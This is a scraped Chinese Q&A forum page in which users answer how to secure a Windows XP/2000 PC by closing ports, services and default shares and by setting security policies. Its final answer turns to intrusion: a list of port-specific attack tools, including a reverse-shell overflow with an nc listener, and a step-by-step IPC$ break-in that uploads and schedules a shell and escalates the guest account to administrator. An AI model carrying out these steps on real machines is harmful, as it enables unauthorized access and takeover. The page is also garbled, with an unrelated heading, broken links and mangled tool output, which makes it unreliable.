借助advanced installerr安装必要的程序,之后不要输nitdro...

(200)怎样最好的配置电脑的安全设置_百度知道
(200)怎样最好的配置电脑的安全设置
以及关闭的具体方法。我的杀软配置是比如,关闭哪些服务:需要关闭哪些端口
卡巴互联网安全组合装7里面已经有防火墙了啊哦,我的系统是XP的
提问者采纳
在防火墙规则里设置。
其他类似问题
按默认排序
其他19条回答
html" target="_blank">http,但是开卡巴杀毒的时候电脑真的很卡..com/cn/index,担心网管ARP攻击我杀毒软件我用的是NOD32 效果不错我以前用卡巴.不过为了安全起见我还是装了NOD32影子系统可以去www..用360查系统漏洞基本就可以了我在公司上网...powershadow://www
2000什么版本的系统?专业版还是server版xp系统的话,其实只要系统补丁打好,管理员密码管理好,外部的入侵基本没问题的.端口也不过是对这些漏洞的利用而已,就算端口开了,没有漏洞一样利用不了.内部的话
如果你对系统安全特别注重的话,建议你按2种以上的杀毒,我现在的是NOD32和瑞星的组合.NOD32占用资源小,杀度能力也非常强,但毕竟是国外的,国内的土病毒有些不能发现.瑞星不用说了
NOD32+瑞星
效果会非常明显,你会发现他们2个的各自长处.
而且着2款杀度 同时运行比较稳定.
不建议2种以上使用卡巴.再弄个防火墙 打上IP规则补丁.ewido这个我也在用.系统应该足够安全了.
EWIDO好像倒闭了现在改名叫AVG了好久以前了如果你没换,赶紧换成AVG,卡巴斯基+AVG对于个人电脑来说已经非常不错了建议装一个超级兔子或者优化大师,清理垃圾文件时候用,
引用:怎样最好的配置电脑的安全设置比如:需要关闭哪些端口,关闭哪些服务,以及关闭的具体方法。
*如果是个人电脑的话只用防火墙+影子系统就好了
不管中什么病毒都有影子系统替你恢复了。
如果是服务器的话看你是什么用途了,开户80,25,1433等常用软件的端口就好了
晕死了!!看着大篇大篇的说,我都不知道咋办啦,呵呵,想要设置端口告诉你一个简单而且非常有效的方法,如果喜欢就设成最佳啊!!第一步:右击“网上邻居”点属性第二步:右击“本地连接”点属性(只要打开IP地址设置窗口就行)第三步:点TCP/IP属性
在最右下角(首选DNS...备用DNS下面)点“高级”第四步:点“选项”,设备你允许通过的端口就行啦。一般上网用80端口另外你开BT或迅雷什么的,里面有端口设备,设备好后在TCP/IP属性里面设置上就万事大吉了,哈哈保证你不会成为别人的肉鸡!!这样你想开哪个端口就开哪个,不知道不了解的一律不许开,端口只在你的控制下啦!!!本想传几个图片呢,没找到上传的按钮,晕死!
如果不发邮件的话,把21端口关了,是FTP端口和发送邮件端口(邮件客户端的发送端口,比如OUTLOOK,你如果在网页上发送邮件的话是不受影响的),关闭远程登陆,关闭打印机共享,关闭系统默认文件共享(运行regedit.打开注册表,打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 在该键下增加一个名为“AutoShareServer”的DWORD值,值设为0。).给administrator加个密码并把这个用户改个名字
不插u盘 你的电脑绝对安全,呵呵人为因素就说不好了
格式化硬盘,断电源,拆主板电池(可去除Boss病毒),再重装系统,不要登陆没信誉的网站, 设置好你要用设置(软件),安装网吧用的还原精灵,保留一个盘不保护(下载东西保存用的),设自动还原,完成后。呵呵..你可以找病毒来玩。要输密码什么的时要在刚开机的时候输,就万无一失了
已经不错了,如果你电脑快的话,再加一个ARP防火墙,和木马防火墙
是不是Vista 的?Vista 我知道,用Vista 优化大师服务优化!
不用了只要上网的时候不要乱进一些不知道的网和下载一些非专业网的东西!~加上常清理一般都是没问题的拉!~木马防火要装!~~
杀毒软件的防火墙会自动关闭未使用的端口。你不用管。服务关闭参考这里:
优化大师.优化.
你可以下载个 WINDOWS优化大师,里面可以设置这些。
如果你的机器为了调试安装了IIS或者AsP要小心了!首先在CMD下输入net user 看看有没有你陌生的帐号,如果有,恭喜你,有可能中奖了!马上删除吧!到控制面板,管理工具,计算机管理,本地用户和组,在用户中把你应该删除的删除了吧! 顺便最好把你不需要的端口关闭了吧!这个最好还是找个专门的扫描软件吧!“控制面板”的“管理工具”中的“服务”中来配置。 关闭Simple TCP/IP Service,支持以下 TCP/IP 服务:Character
Generator, Daytime, Discard, Echo, 以及 Quote of the Day。& 关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。 关掉23端口:关闭Telnet服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。 关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。 关闭80口:关掉WWW服务。在“服务”中显示名称为&World Wide Web Publishing Service&,通过 Internet 信息服务的管理单元提供 Web 连接和管理。 Fport工具可以把本机开放的TCP/UDP端口同应用程序关联起来,这和使用'netstat-an'命令产生的效果类似,但是该软件还可以把端口和运行着的进程关联起来,并可以显示进程PID,名称和路径。该软件可以用于将未知的端口同应用程序关联起来。在CERNET应急响应组的网站上可以获得fport工具,下载路径为:
。 下载的文件为fport.zip,
用winzip或winrar解开后存放到一个目录下就可以。比如我们把fport放在D:\fport-2.0下。那么,我们运行fport:: D:\fport-2.0& fport 输出结果如下:FPort v2.0 - TCP/IP Process to Port MapperCopyright 2000 by Foundstone, Inc.Pid
Proto Path
C:\WINDOWS\system32\svchost.exe4
C:\WINDOWS\System32\svchost.exe1652
C:\PROGRA~1\NORTON~1\navapw32.exe1860
C:\WINDOWS\System32\inetsrv\inetinfo.exe1880
C:\Program Files\Messenger\msmsgs.exe2736
C:\Program Files\Internet Explorer\iexplore.exe956
C:\Program Files\Messenger\msmsgs.exe2736
C:\Program Files\Internet Explorer\iexplore.exe744
C:\WINDOWS\system32\svchost.exe1332
C:\Program Files\SecureCRT\SecureCRT.exe2664
C:\Program Files\SecureCRT\SecureCRT.exe4
C:\WINDOWS\System32\svchost.exe2524
C:\Program Files\SecureCRT\SecureCRT.EXE1860
C:\WINDOWS\System32\inetsrv\inetinfo.exe1880
C:\Program Files\Messenger\msmsgs.exe2812
D:\tools\wsftppro.exe
C:\PROGRA~1\NORTON~1\navapw32.exe4
C:\Program Files\Messenger\msmsgs.exe2736
C:\Program Files\Internet Explorer\iexplore.exe2812
D:\tools\wsftppro.exe
C:\Program Files\Messenger\msmsgs.exe
从fport的输出结果中我们可以发现有没有不安全的tcp/udp端口开着,如果有就用前面介绍的方法把该端口关闭,或将相关程序删除。
关闭默认共享:在Windows
2000中,有一个“默认共享”,这是在安装服务器的时候,把系统安装分区自动进行共享,虽然对其访问还需要超级用户的密码,但这是潜在的安全隐患,从服务器的安全考虑,最好关闭这个“默认共享”,以保证系统安全。方法是:单击“开始/运行”,在运行窗口中输入“Regedit”,打开注册表编辑器,展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Lanmanworkstation\parameters”,在右侧窗口中创建一个名为“AutoShareWks”的双字节值,将其值设置为0,(Win2000
专业版 Win XP);[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
&AutoShareServer&=dword: (win2000
server、win2003
server)这样就可以彻底关闭“默认共享”。(对了记住在DOS下运行net share c$Content$/del,有几个默认共享就执行几次,可别告诉我这不会喽:)
好了,这样你的机器对于那些菜鸟黑客基本算是安全的了!(估计高手对你的机器也不感兴趣)
参考资料:
忘了在哪看的了.
你现在的重点应防在系统本身上~不要过分以来KVP EWIDO之类...系统设置网上有一句话是“最小的权限+最少的服务=最大的安全”。此句基本上是个人都看过,但我好像没有看到过一篇讲的比较详细稍具全面的文章,下面就以我个人经验作一次教学尝试!最小的权限如何实现?NTFS系统权限设置 在使用之前将每个硬盘根加上 Administrators 用户为全部权限(可选加入SYSTEM用户)删除其它用户,进入系统盘:权限如下C:\WINDOWS Administrators SYSTEM用户全部权限 Users 用户默认权限不作修改其它目录删除Everyone用户,切记C:\Documents and Settings下All Users\Default User目录及其子目录如C:\Documents and Settings\All Users\Application Data 目录默认配置保留了Everyone用户权限C:\WINDOWS 目录下面的权限也得注意,如 C:\WINDOWS\PCHealth、C:\windows\Installer也是保留了Everyone权限.删除C:\WINDOWS\Web\printers目录,此目录的存在会造成IIS里加入一个.printers的扩展名,可溢出攻击默认IIS错误页面已基本上没多少人使用了。建议删除C:\WINDOWS\Help\iisHelp目录删除C:\WINDOWS\system32\inetsrv\iisadmpwd,此目录为管理IIS密码之用,如一些因密码不同步造成500错误的时候使用 OWA 或 Iisadmpwd 修改同步密码,但在这里可以删掉,下面讲到的设置将会杜绝因系统设置造成的密码不同步问题。打开C:\Windows 搜索net.cmd.tftp.netstat.regedit.at.attrib.cacls.;regsvr32.xcopy.wscript.cscript.ftp.telnet.arp.edlin.ping.route.finger.posix.rsh.atsvc.qbasic.runonce.syskey.exe修改权限,删除所有的用户只保存Administrators 和SYSTEM为所有权限关闭445端口HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\netBT\Parameters新建 “DWORD值”值名为 “SMBDeviceEnabled” 数据为默认值“0”禁止建立空连接HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa新建 “DWORD值”值名为 “RestrictAnonymous” 数据值为“1” [2003默认为1] 禁止系统自动启动服务器共享HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters新建 “DWORD值”值名为 “AutoShareServer” 数据值为“0”禁止系统自动启动管理共享HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters新建 “DWORD值”值名为 “AutoShareWks” 数据值为“0”通过修改注册表防止小规模DDOS攻击HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters新建 “DWORD值”值名为 “SynAttackProtect” 数据值为“1”禁止dump file的产生dump文件在系统崩溃和蓝屏的时候是一份很有用的查找问题的资料。然而,它也能够给黑客提供一些敏感信息比如一些应用程序的密码等。控制面板&系统属性&高级&启动和故障恢复把 写入调试信息 改成无。关闭华医生Dr.Watson在开始-运行中输入“drwtsn32”,或者开始-程序-附件-系统工具-系统信息-工具-Dr Watson,调出系统里的华医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如果以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。本地安全策略配置开始 & 程序 & 管理工具 & 本地安全策略账户策略 & 密码策略 & 密码最短使用期限 改成0天[即密码不过期,上面我讲到不会造成IIS密码不同步] 账户策略 & 账户锁定策略 & 账户锁定阈值 5 次 账户锁定时间 10分钟 [个人推荐配置] 本地策略 & 审核策略 & 账户管理 成功 失败登录事件 成功 失败对象访问 失败策略更改 成功 失败特权使用 失败系统事件 成功 失败目录服务访问 失败账户登录事件 成功 失败本地策略 & 安全选项 & 清除虚拟内存页面文件 更改为&已启用&
& 不显示上次的用户名 更改为&已启用&
& 不需要按CTRL+ALT+DEL 更改为&已启用&
& 不允许 SAM 账户的匿名枚举 更改为&已启用&
& 不允许 SAM 账户和共享的匿名枚举 更改为&已启用&
& 重命名来宾账户 更改成一个复杂的账户名
& 重命名系统管理员账号 更改一个自己用的账号 [同时可建立一个无用户组的Administrat账户] 组策略编辑器运行 gpedit.msc 计算机配置 & 管理模板 & 系统 显示“关闭事件跟踪程序” 更改为已禁用 删除不安全组件WScript.Shell 、Shell.application 这两个组件一般一些ASP木马或一些恶意程序都会使用到。方案一:regsvr32 /u wshom.ocx 卸载WScript.Shell 组件 regsvr32 /u shell32.dll 卸载Shell.application 组件如果按照上面讲到的设置,可不必删除这两个文件方案二:删除注册表 HKEY_CLASSES_ROOT\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} 对应 WScript.Shell删除注册表 HKEY_CLASSES_ROOT\CLSID\{9-11CE-A49E-} 对应 Shell.application用户管理建立另一个备用管理员账号,防止特殊情况发生。安装有终端服务与SQL服务的服务器停用TsInternetUser, SQLDebugger这两个账号用户组说明在将来要使用到的IIS中,IIS用户一般使用Guests组,也可以再重新建立一个独立的专供IIS使用的组,但要将这个组赋予C:\Windows 目录为读取权限[单一读取] 个人不建议使用单独目录,太小家子气。最少的服务如果实现黑色为自动 绿色为手动 红色为禁用 AlerterApplication Experience Lookup ServiceApplication Layer Gateway ServiceApplication ManagementAutomatic Updates [Windows自动更新,可选项] Background Intelligent Transfer ServiceClipBookCOM+ Event SystemCOM+ System ApplicationComputer BrowserCryptographic ServicesDCOM Server Process LauncherDHCP ClientDistributed File SystemDistributed Link Tracking ClientDistributed Link Tracking ServerDistributed Transaction CoordinatorDNS ClientError Reporting ServiceEvent LogFile ReplicationHelp and SupportHTTP SSLHuman Interface Device AccessIIS Admin ServiceIMAPI CD-Burning COM ServiceIndexing ServiceIntersite MessagingIPSEC Services [如果使用了IP安全策略则自动,如无则禁用,可选操作] Kerberos Key Distribution CenterLicense LoggingLogical Disk Manager [可选,多硬盘建议自动] Logical Disk Manager Administrative ServiceMessengerMicrosoft SearchMicrosoft Software Shadow Copy ProviderMSSQLSERVERMSSQLServerADHelperNet LogonNetMeeting Remote Desktop SharingNetwork ConnectionsNetwork DDENetwork DDE DSDMNetwork Location Awareness (NLA)Network Provisioning ServiceNT LM Security Support ProviderPerformance Logs and AlertsPlug and PlayPortable Media Serial Number Service [微软反盗版工具,目前只针对多媒体类] Print SpoolerProtected StorageRemote Access Auto Connection ManagerRemote Access Connection ManagerRemote Desktop Help Session ManagerRemote Procedure Call (RPC)Remote Procedure Call (RPC) LocatorRemote RegistryRemovable StorageResultant Set of Policy ProviderRouting and Remote AccessSecondary LogonSecurity Accounts ManagerServerShell Hardware DetectionSmart CardSpecial Administration Console HelperSQLSERVERAGENTSystem Event NotificationTask SchedulerTCP/IP NetBIOS HelperTelephonyTelnetTerminal ServicesTerminal Services Session DirectoryThemesUninterruptible Power SupplyUpload ManagerVirtual Disk ServiceVolume Shadow CopyWebClientWindows Audio [服务器没必要使用声音] Windows Firewall/Internet Connection Sharing (ICS)Windows Image Acquisition (WIA)Windows InstallerWindows Management InstrumentationWindows Management Instrumentation Driver ExtensionsWindows TimeWindows User Mode Driver FrameworkWinHTTP Web Proxy Auto-Discovery ServiceWireless ConfigurationWMI Performance AdapterWorkstationWorld Wide Web Publishing Service以上操作完成以后是否就“最小的权限+最少的服务=最大的安全”呢?其实不然,任何事物都是相对的依我个人而见,以上设置也只是最基本的一些东西而已,如有遗漏,稍后补上!
系统安全从定制IP策略开始:本人所讲的端口指的是逻辑意义上的端口,它是计算机和外部网络相连的逻辑接口,也是计算机的第一道屏障。默认情况下,Windows有很多端口是开放的,上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,我们除了一些重要的端口,如80端口为Web网站服务;21端口为FTP服务;25端口为E-mail SMTP服务;110端口为E-mail POP3服务;1433端口为SQL Server服务等外,一些没有服务的端口都可以关闭,如TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 、6129 端口),以及远程服务访问端口3389等。对于一些没有服务的端口,除了使用一些网络防火墙来关闭外,借助IP安全策略来进行关闭可以说是一个阻止入侵者入侵的好办法,下面我们就来定制IP策略。第一步:单击&开始&菜单,然后选择&设置→控制面板&,在弹出的&控制面板&中,双击&管理工具&图标,进入到&管理工具&中,再次双击其中的&本地安全策略&图标并进入到&本地安全策略&对话框中。
第二步:用鼠标右击&IP安全策略&,选择&创建IP安全策略&命令在弹出的&IP安全策略向导&对话框中,单击&下一步&按钮,输入IP安全策略的名称2、设置IP筛选器
鼠标右击&IP安全策略&,选择&管理IP筛选器和筛选器操作&,进入到相应得对话框中,在&管理IP筛选器列表&页面中,点击&添加&按钮,在弹出的&IP筛选器列表&中输入名称&屏蔽135端口&,单击&添加&按钮,再点击&下一步&按钮。在目标地址中选择&我的IP地址&,点击&下一步&按钮,在协议中选择&TCP&(一般选择此项,根据具体的端口设定,如关闭ICMP协议时,这里选择ICMP),如图3所示,点击&下一步&按钮,在设置IP协议端口中选择从任意端口到此端口,在此端口中输入135,点击&下一步&按钮,即可完成屏蔽135端口的设置,单击&确定&按钮返回。其他端口的设置与此类似。3、筛选器操作
还是在&管理IP筛选器和筛选器操作&对话框,进入到&管理筛选器操作&页面,点击&添加&按钮后,再单击&下一步&按钮,在名称中输入&拒绝&,点击&下一步&按钮。在筛选器操作中选择&阻止&项,点击&下一步&按钮,这样在管理筛选器操作中就会增加&拒绝&一项了完成了&屏蔽135端口&的IP安全策略的建立,但是在未被指派之前,它并不会起作用。用鼠标右击&屏蔽135端口&,选择&指派&后,IP安全策略就生效了。同样的方法还可以关闭其他的无用端口,这样我们就亲手创建一个了安全的网络防火墙。
网络安全中谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种: (1) 被他人盗取密码;
(2) 系统被木马攻击;
(3) 浏览网页时被恶意的java scrpit程序攻击;
(4) QQ被攻击或泄漏信息;
(5) 病毒感染;
(6) 系统存在漏洞使他人攻击自己。
(7) 黑客的恶意攻击。
下面我们就来看看通过什么样的手段来更有效的防范攻击。
1.察看本地共享资源
运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
2.删除共享(每次输入一个) net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINE\SYSTEM\CurrentControSet\Control\LSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
4.关闭自己的139端口,Ipc和RPC漏洞存在于此
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
5.防止Rpc漏洞
打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
Windwos XP SP2和Windows2000 Pro Sp4,均不存在该漏洞。
6.445端口的关闭
修改注册表,添加一个键值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为 0这样就ok了。
7.3389的关闭
WindowsXP:我的电脑上点右键选属性--&远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
Win2000server 开始--&程序--&管理工具--&服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
使用Windows2000 Pro的朋友注意,网络上有很多文章说在Win2000pro 开始--&设置--&控制面板--&管理工具--&服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。 8.4899的防范
网络上有许多关于的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
9、禁用服务
打开控制面板,进入管理工具——服务,关闭以下服务: 1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无
法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help&Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支
持而使用户能够共享文件 、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。10、账号密码的安全原则
首先禁用guest帐号,将系统内建的administrator帐号改名(改的越复杂越好,最好改成中文的),而且要设置一个密码,最好是8位以上字母数字符号组合。
如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置。
打开管理工具—本地安全设置—密码策略: 1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是8
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
11、本地策略
这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)
打开管理工具,找到本地安全设置—本地策略—审核策略: 1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
&然后再到管理工具找到事件查看器:
应用程序:右键&属性&设置日志大小上限,我设置了50mb,选择不覆盖事件。
安全性:右键&属性&设置日志大小上限,我也是设置了50mb,选择不覆盖事件。
系统:右键&属性&设置日志大小上限,我都是设置了50mb,选择不覆盖事件。 12、本地安全策略
打开管理工具,找到本地安全设置—本地策略—安全选项:
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登
2.网络访问.不允许SAM帐户的匿名枚举 启用。
3.网络访问.可匿名的共享 将后面的值删除。
4.网络访问.可匿名的命名管道 将后面的值删除。
5.网络访问.可远程访问的注册表路径 将后面的值删除。
6.网络访问.可远程访问的注册表的子路径 将后面的值删除。
7.网络访问.限制匿名访问命名管道和共享。
8.帐户.(前面已经详细讲过拉 )。
13、用户权限分配策略
打开管理工具,找到本地安全设置—本地策略—用户权限分配:
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属
于自己的ID。
2.从远程系统强制关机,Admin帐户也删除,一个都不留 。
3.拒绝从网络访问这台计算机 将ID删除。
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务。
5.通过远端强制关机。删掉。
14、终端服务配置 打开管理工具,终端服务配置: 1.打开后,点连接,右键,属性,远程控制,点不允许远程控制。
2.常规,加密级别,高,在使用标准Windows验证上点√!
3.网卡,将最多连接数上设置为0。
4.高级,将里面的权限也删除。
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话。
15、用户和组策略
打开管理工具,计算机管理—本地用户和组—用户:
删除Support_用户等等只留下你更改好名字的adminisrator权限。
计算机管理—本地用户和组—组,组.我们就不分组了。16、自己动手DIY在本地策略的安全选项
1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透。
2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户
名.让他去猜你的用户名去吧。
3)对匿名连接的额外限制。
4)禁止按 alt+crtl +del(没必要)。
5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]。
6)只有本地登陆用户才能访问cd-rom。
7)只有本地登陆用户才能访问软驱。
8)取消关机原因的提示。
A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签
B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确
定”按钮,来退出设置框;
C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能
键,来实现快速关机和开机;
D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页
面,并在其中将“启用休眠”选项选中就可以了。
9)禁止关机事件跟踪
开始“Start -&”运行“ Run -&输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-& ”管理模板“(Administrative Templates)-& ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口。
17、常见端口的介绍
1025 DCE/1ff-30e8-076d-740be8cee98b
1026 DCE/4-abcd-ef00-ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
Terminal Services
4444[冲击波]
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了。
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。(啊D的注入软件)。5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码6. 554端口用real554.exe入侵。7. 6129端口用DameWare6129.exe入侵。8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。10. 其他入侵利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。经典IPC$入侵1. C:\&net use \\127.0.0.1\IPC$ && /user:&admintitrators& 这是用&流光&扫到的用户名是administrators,密码为&空&的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为&空&,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\&copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。3. C:\&net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是
上午 11:00,命令成功完成。
4. C:\&at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\&net time \\127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是
上午 11:05,那就准备开始下面的命令。
6. C:\&telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\&copy ntlm.exe \\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32&ntlm 输入ntlm启动(这里的C:\WINNT\system32&指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现&DONE&的时候,就说明已经启动正常。然后使用&net start telnet&来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组 10. C:\&net user guest /active:yes 将对方的Guest用户激活11. C:\&net user guest 1234 将Guest的密码改为1234,或者你要设定的密码12. C:\&net localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
您可能关注的推广回答者:
配置电脑的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁}

我要回帖

更多关于 installer 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信